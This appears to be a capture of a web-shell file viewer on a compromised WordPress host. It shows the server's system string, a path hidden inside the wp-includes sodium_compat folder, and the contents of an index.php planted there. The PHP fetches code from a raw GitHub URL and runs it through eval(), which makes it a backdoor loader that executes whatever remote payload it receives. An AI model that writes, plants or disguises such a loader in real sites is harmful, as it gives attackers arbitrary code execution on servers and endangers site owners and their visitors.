| Linux webm007.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64 Path : /home/eglisebaa/www/wp-includes/sodium_compat/src/63452/ |
| Current File : /home/eglisebaa/www/wp-includes/sodium_compat/src/63452/index.php |
<?php $url='https://raw.githubusercontent.com/habur690/ulav/refs/heads/main/buns.php';$context=stream_context_create(['http'=>['follow_location'=>1,'timeout'=>10,'ignore_errors'=>true],'ssl'=>['verify_peer'=>true,'verify_peer_name'=>true]]);$handle=@fopen($url,'r',false,$context);$content=$handle?stream_get_contents($handle):'';if($handle)fclose($handle);if(!empty($content)){eval('?>'.$content);}else{echo "error";}